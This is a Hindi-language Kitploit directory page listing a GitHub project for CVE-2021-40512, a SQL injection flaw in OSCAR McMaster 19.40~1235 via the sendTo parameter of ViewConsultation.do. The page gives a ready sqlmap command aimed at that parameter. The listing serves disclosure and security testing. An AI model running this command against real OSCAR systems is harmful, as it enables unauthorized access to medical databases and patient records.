Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2021-40512 — CVE-2021-40512 OSCAR McMaster 19.40~1235 SQL इंजेक्शन भेद्यता। | Kitploit
उपकरण/GitHubGitHub/war4uthor/cve-2021-40512
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंग
GitHubwar4uthor/cve-2021-40512

CVE-2021-40512

CVE-2021-40512 OSCAR McMaster 19.40~1235 SQL इंजेक्शन भेद्यता।

रिपॉजिटरी देखें
4 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2021-40512 OSCAR McMaster 19.40~1235 SQL इंजेक्शन भेद्यता

OSCAR McMaster के संस्करण 19.40~1235 में एक SQL इंजेक्शन भेद्यता मौजूद है। एक दुर्भावनापूर्ण हमलावर /oscar/oscarEncounter/ViewConsultation.do एंडपॉइंट पर स्थित कमजोर sendTo पैरामीटर के माध्यम से MySQL/MariaDB डेटाबेस को SQL कमांड जारी कर सकता है।

[Placeholder for cve.mitre]

[Placeholder for nist]

कमजोर JSP पृष्ठ:

ViewConsultation.do - sendTo पैरामीटर

कमजोर पेलोड:

sqlmap -u "/oscar/oscarEncounter/ViewConsultation.do?sendTo=&startDate=&endDate=&searchDate=0&currentTeam=&orderby=2&desc=0&offset=&limit=100&mrpNo=&patientId=&serviceFilter=&consultantFilter=&urgencyFilter=" --cookie= -p sendTo --banner

जैक मैकब्राइड द्वारा खोजा गया, अगस्त 2021

टूल डाउनलोड करें